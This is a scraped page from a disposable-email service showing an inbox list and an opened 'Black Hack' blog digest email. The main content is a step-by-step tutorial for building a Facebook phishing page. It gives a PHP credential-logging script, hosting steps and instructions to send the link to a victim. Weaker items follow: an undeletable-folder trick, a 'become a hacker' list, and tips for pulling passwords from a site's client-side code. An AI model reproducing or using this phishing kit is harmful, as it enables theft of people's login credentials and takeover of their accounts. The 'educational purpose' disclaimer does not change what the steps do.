Your have: 17 messages Automatic search for emails

Time (UTC)
Follow this 21-point checklist to optimize your blog posts
2016-10-25 15:15:27
What to Know This Week
2016-10-21 16:29:48
Using top of funnel (TOFU) content to nurture leads
2016-10-18 15:24:51
What to Know This Week
2016-10-14 15:27:44
Drive more organic traffic with this SEO tactic
2016-10-11 15:23:18
What to Know This Week
2016-10-07 15:41:28
New! Connect Alexa + Google Search Console Data
2016-10-06 15:16:19
8 steps to picking better sites to guest blog on
2016-10-04 15:20:33
What to Know This Week
2016-09-30 15:28:13
How semantic search affects your SEO
2016-09-27 15:52:54
What to Know This Week
2016-09-23 16:28:23
New! Buyer keywords + Clusters added to Competitor Keyword Matrix
2016-09-21 16:03:44
4 things to consider before you outsource SEO
2016-09-20 15:13:41
What to Know This Week
2016-09-16 15:47:21
How to use buyer keywords to attract the right audience
2016-09-13 15:46:24
What to Know This Week
2016-09-09 15:20:50
Black Hack
2016-05-22 22:11:53
From: (sender info)

Black Hack

Received: 2016-05-22 22:11:53
(3 sec.) Created: 2016-05-22 22:11:50 (?)

Black Hack

How to hack Facebook with phishing page

Posted: 22 May 2016 12:23 PM PDT

      How to hack Facebook with phishing page



As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....


facebook hack

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

                                  a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script

4.You will have to find a text which looks like ..


5.delete all the text written in red colour and instead of it write post.php.then it will look like...


6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is will look like a pic given below .

hacking script

8.Open a new notepad and save the given data with the name post.php.

header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use or else www.,

11.I prefer u to use 000webhost because it will be easy to use.
hosting website

12.You have to make a account in that ,after that it looks like a picture given below.

facebook script hosting website
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.


20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.

       click here to view a video tutorial with the readymade phishing pages....


phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....


Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way..

Create A Undeletable And Unrenamable Folders In Windows

Posted: 22 May 2016 12:24 PM PDT

Create A Undeletable And Unrenamable Folders In Windows

creating undeleteable files
In this tutorial you will learn cool and  simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
  1. Open Command Prompt
  2. Type D: ( if u created this type of folder in D: drive) & hit enter
  3. Type rd con\ (rd - remove directory)
  4. Open that directory and the folder will not appear because it is removed.

12 Simple Steps To Become A Hacker

Posted: 22 May 2016 12:24 PM PDT

12 Simple Steps To Become A Hacker

Steps to become a hacker
Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look


linux operating system
UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.

2. Code in C language 

c programming
C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970's. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

programming languages

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

computer networking
Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

operating system
It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

cryptography encryption
To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

hacking or hackers
Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

Simple Cool Tricks With Chrome Developer Tool

Posted: 22 May 2016 12:25 PM PDT

Simple Cool Tricks With Chrome Developer Tool

 Chrome Developer Tool
As you probably know, there is a button on the right-click menu of Google Chrome and IE 10+ called ''Inspect element''. This the developer tool. And you can have a lot of fun with it. I'll give you two examples on how to use it in this tutorial.

1. Change the text of a webpage:

You can have fun on webpages just by changing the value of a  (a text label). For example, go on the site (a free file sharing site). Then create an account if you don't have one (or just connect with Google, Facebook or Twitter). When you are done, upload something that is heavy (more than 100 MB) by dragging and dropping it on the home page of 4shared. Then you can see an uploading status window on the screen. So right-click on the percentage and click on ''Inspect element''. Now you can see a little window that appears on the bottom of the web browser. There are to ways : either you got the number or you got the % symbol. If you got the number, try to find the symbol below. Then double-click on it and type what you want (Eg: '',000,000 dollars in my bank account'')

google chrome tricks

2. Get a Non-Crypted password in JS/PhP code:

Some sites are not very safe and just verify the password directly in the PhP/JS code. Then, even if it become rare, you can get the password. Just follow these steps :

  1. Find the login form on the website you want to hack
  2. Right-click on it and then click on ''Inspect element''
  3. Search on the window that appeared ''
  4. After it, there is a URL, If it ends by ''.js'', just copy it and paste it in the URL bar of your browser
  5. If it ends by ''.php'', type ''view-source:'' before pasting the URL
  6. Then search something like ''password'' in the code.
WARNING: This method works better with JS than with PHP. Sometimes, there is no URL after ''action='' but just a JS function. Then you have to press Ctrl+U to see the source and search for ''password'' in the whole code.

Needs more domains names? Add your own domains using

What is "" - service?

Unlimited mailboxes

You can use as many email accounts as you need.


Letters have come to the mailbox publicly available. And at any time you can remove any messages.

Messages keep unlimited time

Messages are stored on the server until someone deletes them.

No need passwords

You do not need to register new mailboxes. Mailbox is created automatically when on it comes a letter.

Do not need to remember address

When you want to get a letter just invent your own address and check it on our website (the list of available domain names can be seen from above).

Name Generator

You can quickly think up the name with name generator -

Hide from the sender

Sender don't know your real ip address and your location.

Support multi-language messages

Fake email service display messages of any language.

Spam block

Tired of spam in your main inbox? Then use our mail to protect yourself from Spam.

Speed and automation

You do not need to wait too much time to get a letter, a letter will appear on your screen at once.